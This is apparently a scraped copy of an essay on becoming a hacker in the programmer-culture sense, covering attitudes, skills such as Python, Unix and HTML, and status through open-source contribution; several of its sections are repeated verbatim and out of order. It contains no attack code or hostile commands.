Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.
The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.
Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.
Finally, a few things not to do.
Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.
The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.
The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms.
Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.
The Hacker/Nerd Connection
The Hacker/Nerd Connection:
Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.
For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.
If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now.
There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.
If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.
Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.
For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.
If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now.
There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.
If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.
Status in the Hacker Culture
Status in the Hacker Culture :
1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself
Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.
Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.
Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.
There are basically five kinds of things you can do to be respected by hackers:
1. Write open-source software
The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.
(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).
Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.
But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.
2. Help test and debug open-source software
They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.
If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.
3. Publish useful information
Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.
Maintainers of major technical FAQs get almost as much respect as open-source authors.
4. Help keep the infrastructure working
The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.
People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.
5. Serve the hacker culture itself
Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.
The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.
1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself
Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.
Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.
Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.
There are basically five kinds of things you can do to be respected by hackers:
1. Write open-source software
The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.
(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).
Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.
But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.
2. Help test and debug open-source software
They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.
If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.
3. Publish useful information
Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.
Maintainers of major technical FAQs get almost as much respect as open-source authors.
4. Help keep the infrastructure working
The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.
People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.
5. Serve the hacker culture itself
Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.
The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.
Basic Hacking Skills
Basic Hacking Skills :
1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.
The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.
This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:
1. Learn how to program.
This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.
I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.
If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.
C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.
Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.
LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)
It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.
But be aware that you won't reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.
I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.
Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.
Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.
Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...
2. Get one of the open-source Unixes and learn to use and run it.
I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.
Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.
Under Mac OS X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.
Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)
So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.
For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.
To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.
During the first ten years of this HOWTO's life, I reported that from a new user's point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.
You can find BSD Unix help and resources at www.bsd.org.
A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it's a way to get a look at the possibilities without having to do anything drastic.
I have written a primer on the basics of Unix and the Internet.
I used to recommend against installing either Linux or BSD as a solo project if you're a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user's group and asking for help. It can't hurt, and may smooth the process.
3. Learn how to use the World Wide Web and write HTML.
Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.
This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)
But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).
To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...
4. If you don't have functional English, learn it.
As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.
Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).
Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.
Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can't yet write competently, learn to.
1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.
The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.
This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:
1. Learn how to program.
This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.
I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.
If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.
C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.
Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.
LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)
It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.
But be aware that you won't reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.
I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.
Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.
Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.
Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...
2. Get one of the open-source Unixes and learn to use and run it.
I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.
Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.
Under Mac OS X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.
Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)
So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.
For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.
To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.
During the first ten years of this HOWTO's life, I reported that from a new user's point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.
You can find BSD Unix help and resources at www.bsd.org.
A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it's a way to get a look at the possibilities without having to do anything drastic.
I have written a primer on the basics of Unix and the Internet.
I used to recommend against installing either Linux or BSD as a solo project if you're a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user's group and asking for help. It can't hurt, and may smooth the process.
3. Learn how to use the World Wide Web and write HTML.
Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.
This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)
But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).
To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...
4. If you don't have functional English, learn it.
As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.
Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).
Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.
Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can't yet write competently, learn to.
The Hacker Attitude
The Hacker Attitude :
1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:
"To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master".
So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.
1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:
"To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master".
So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
